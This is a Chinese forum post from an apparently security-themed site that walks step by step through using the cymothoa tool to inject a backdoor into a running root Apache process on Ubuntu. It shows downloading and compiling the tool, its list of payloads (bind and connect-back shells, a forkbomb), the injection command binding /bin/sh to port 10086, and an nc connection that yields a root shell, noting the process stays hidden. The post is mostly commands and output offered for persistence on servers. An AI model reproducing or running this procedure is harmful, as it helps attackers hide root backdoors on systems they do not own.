切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
378 进程注入 cymothoa[复制链接]
发表于 2012-12-25 00:52:54 | 显示全部楼层 |!read_mode!
适用于长期不关闭的服务器。
UBUNTU SERVER
  1. root@Server:~# wget http://sourceforge.net/projects/cymothoa/files/cymothoa-1-beta/cymothoa-1-beta.tar.gz/download

  2. root@Server:~# tar xf download
  3. root@Server:~# cd cymothoa-1-beta/
  4. root@Server:~/cymothoa-1-beta# make
  5. cc bgrep.c -o bgrep
  6. cc udp_server.c -o udp_server
  7. cc cymothoa.c -o cymothoa -Dlinux_x86
  8. root@Server:~/cymothoa-1-beta#
复制代码


关于后门方式


  1. root@Server:~/cymothoa-1-beta# ./cymothoa -S

  2. 0 - bind /bin/sh to the provided port (requires -y)
  3. 1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
  4. 2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
  5. 3 - /bin/sh connect back (requires -x, -y)
  6. 4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
  7. 5 - script execution (see the payload), creates a tmp file you must remove
  8. 6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
  9. 7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
  10. 8 - forkbomb (just for fun...) - Kris Katterjohn
  11. 9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
  12. 10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
  13. 11 - POC alarm() scheduled shellcode
  14. 12 - POC setitimer() scheduled shellcode
  15. 13 - alarm() backdoor (requires -j -y) bind port, fork on accept
  16. 14 - setitimer() tail follow (requires -k -x -y) send data via upd
  17. root@Server:~/cymothoa-1-beta#
复制代码


很多

先找个进程 APACHE


  1. root@Server:~/cymothoa-1-beta# ps aux | grep apache
  2. root       745  0.0  2.9  36368  7424 ?        Ss   22:39   0:00 /usr/sbin/apache2 -k start
  3. www-data   770  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
  4. www-data   771  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
  5. www-data   772  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
  6. www-data   773  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
  7. www-data   774  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
  8. root      1189  0.0  0.3   3664   776 pts/0    S+   22:46   0:00 grep --color=auto apache
  9. root@Server:~/cymothoa-1-beta#
复制代码

进程ID 745 ROOT权限
root 745 0.0 2.9 36368 7424 ? Ss 22:39 0:00 /usr/sbin/apache2 -k start
注入尝试


  1. root@Server:~/cymothoa-1-beta# ./cymothoa -p 745 -s 0 -y 10086
  2. [+] attaching to process 745

  3. register info:
  4. -----------------------------------------------------------
  5. eax value: 0xfffffdfe         ebx value: 0x0
  6. esp value: 0xbfb7579c         eip value: 0xb786a424
  7. ------------------------------------------------------------

  8. [+] new esp: 0xbfb75798
  9. [+] payload preamble: fork
  10. [+] injecting code into 0xb786b000
  11. [+] copy general purpose registers
  12. [+] detaching from 745

  13. [+] infected!!!
  14. root@Server:~/cymothoa-1-beta#
复制代码

-p是进程 -s是后门方式 -y设置端口链接测试

  1. root@Server:~/cymothoa-1-beta# nc 127.0.0.1 10086
  2. id
  3. uid=0(root) gid=0(root) groups=0(root)
复制代码

隐藏了进程 但是木游隐藏端口
  1. root@Server:~/cymothoa-1-beta# ps -ef | grep cymothoa
  2. root      1203  1000  0 22:48 pts/0    00:00:00 grep --color=auto cymothoa
  3. root@Server:~/cymothoa-1-beta# netstat -antp | grep 10086
  4. tcp        0      0 127.0.0.1:38321         127.0.0.1:10086         TIME_WAIT   -   
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2019-12-14 10:54

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部